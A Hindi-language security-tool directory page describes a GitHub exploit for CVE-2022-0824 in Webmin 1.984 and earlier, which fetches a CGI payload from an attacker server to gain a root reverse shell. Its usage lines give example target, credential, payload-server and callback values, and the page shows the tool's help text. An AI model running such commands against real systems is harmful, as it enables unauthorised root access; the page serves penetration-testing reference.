Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Webmin-CVE-2022-0824-revshell — Webmin <=1.984 के लिए प्रमाणीकरण के बाद (post-authentication) रिवर्स शेल एक्सप्लॉइट, जो CVE-2022-0824 File Manager विशेषाधिकार वृद्धि (privilege escalation) का लाभ उठाता है। रूट एक्सेस प्राप्त करने के लिए CGI पेलोड डाउनलोड करता है और निष्पादित करता है। | Kitploit
उपकरण/GitHubGitHub/faisalfs10x/webmin-cve-2022-0824-revshell
विशेषाधिकार वृद्धिपेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंग
GitHubfaisalfs10x/webmin-cve-2022-0824-revshell

Webmin-CVE-2022-0824-revshell

Webmin <=1.984 के लिए प्रमाणीकरण के बाद (post-authentication) रिवर्स शेल एक्सप्लॉइट, जो CVE-2022-0824 File Manager विशेषाधिकार वृद्धि (privilege escalation) का लाभ उठाता है। रूट एक्सेस प्राप्त करने के लिए CGI पेलोड डाउनलोड करता है और निष्पादित करता है।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
1113324 साल पहलेKitploit द्वारा समीक्षित

Webmin-CVE-2022-0824-revshell

भेद्यता विवरण

Webmin 1.984 और उससे नीचे - File Manager विशेषाधिकार शोषण (CVE-2022-0824 और CVE-2022-0829)
कम विशेषाधिकार वाले Webmin उपयोगकर्ता जिनके पास File Manager मॉड्यूल प्रतिबंध कॉन्फ़िगर नहीं हैं, वे डिफ़ॉल्ट Authentic थीम का उपयोग करने पर रूट विशेषाधिकारों के साथ फ़ाइलों तक पहुँच सकते हैं। अतिरिक्त अविश्वसनीय Webmin उपयोगकर्ताओं वाले सभी सिस्टम को तुरंत अपग्रेड करना चाहिए। ध्यान दें कि Virtualmin सिस्टम इस बग से प्रभावित नहीं होते हैं, क्योंकि डोमेन स्वामी Webmin उपयोगकर्ताओं को कॉन्फ़िगर करने के तरीके के कारण।
स्रोत: https://www.webmin.com/security.html

शोषण विवरण

यह शोषण File Manager में प्रमाणीकरण के बाद (post-auth) अनुचित अभिगम नियंत्रण (Improper Access Control) भेद्यता का लाभ उठाता है। यह शोषण किसी भी कम विशेषाधिकार वाले प्रमाणित हमलावर द्वारा किया जा सकता है। यह हमलावर-नियंत्रित सर्वर से दूरस्थ रूप से एक .cgi फ़ाइल डाउनलोड करेगा और इसकी अनुमति को विश्व-निष्पादन योग्य (world-executable) फ़ाइल में संशोधित करेगा। एक बार ऐसा हो जाने पर, यह .cgi फ़ाइल को निष्पादित करेगा ताकि हमलावर-नियंत्रित सर्वर के साथ रूट विशेषाधिकारों के साथ एक रिवर्स कनेक्शन स्थापित किया जा सके।

संदर्भ: https://huntr.dev/bounties/d0049a96-de90-4b1a-9111-94de1044f295/

उपयोग

root@kitploit:~
$~ python3 Webmin-revshell.py -t [TARGET] -c [CREDENTIAL] -LS [PY3HTTP_SERVER] -L [CALLBACK_IP] -P [CALLBACK_PORT]
$~ python3 Webmin-revshell.py -t https://192.168.5.118:10000 -c user:user123 -LS 192.168.5.120:9090 -L 192.168.5.120 -P 4444

$~  python3 Webmin-revshell.py -h                                                                                                                                    
    usage: Webmin-revshell.py [-h] -t TARGET -c CREDENTIAL -LS PY3HTTP_SERVER -L CALLBACK_IP -P CALLBACK_PORT [-V]

    Webmin CVE-2022-0824 Reverse Shell

    optional arguments:
      -h, --help            show this help message and exit
      -t TARGET, --target TARGET
                            Target full URL, https://www.webmin.local:10000
      -c CREDENTIAL, --credential CREDENTIAL
                            Format, user:user123
      -LS PY3HTTP_SERVER, --py3http_server PY3HTTP_SERVER
                            Http server for serving payload, ex 192.168.5.120:8080
      -L CALLBACK_IP, --callback_ip CALLBACK_IP
                            Callback IP to receive revshell
      -P CALLBACK_PORT, --callback_port CALLBACK_PORT
                            Callback port to receive revshell
      -V, --version         show program's version number and exit

प्रमाण-अवधारणा (PoC)

root@kitploit:~
target host: https://192.168.5.118:10000
attacker host: 192.168.5.120

https://user-images.githubusercontent.com/51811615/156904265-80c2ee4f-8447-41cd-9197-446bf6555e25.mp4

परीक्षण किया गया

root@kitploit:~
- Webmin 1.984
- Ubuntu 18.04
- Kali 2021.3

अस्वीकरण:

root@kitploit:~
The script is for security analysis and research only, hence I would not be liable if it is been used for illicit activities
टूल डाउनलोड करें